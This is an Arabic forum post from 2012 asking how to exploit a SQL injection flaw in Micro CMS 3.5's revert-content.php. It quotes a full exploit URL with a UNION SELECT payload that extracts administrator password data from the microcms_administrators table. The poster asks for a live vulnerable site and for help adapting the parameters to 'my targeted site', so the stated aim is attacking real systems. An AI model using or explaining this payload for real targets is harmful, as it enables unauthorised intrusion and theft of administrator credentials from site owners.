بسم الله الرحمن الرحيم
انا كنت عملت موضوع سالت فيه عن استغلال السغرة
Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability
ولكن يبدو اني قد اخطاءت في طريقة السوال
فان اقصد
شرح الاستغلال مثال
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/*
================================================== ================================================== ================================================== ======================================
هذا هو الاستغلال
site.com= الموقع المصاب
فماذا يقصد ب
newest=؟
او بمعني اخر كيفيتة تريكب السغرة
ارجو اضافة موقع علي الثغرة
وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف
وشكرا لكم
10-24-2012, 05:30 AM
رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)
العرض الشجري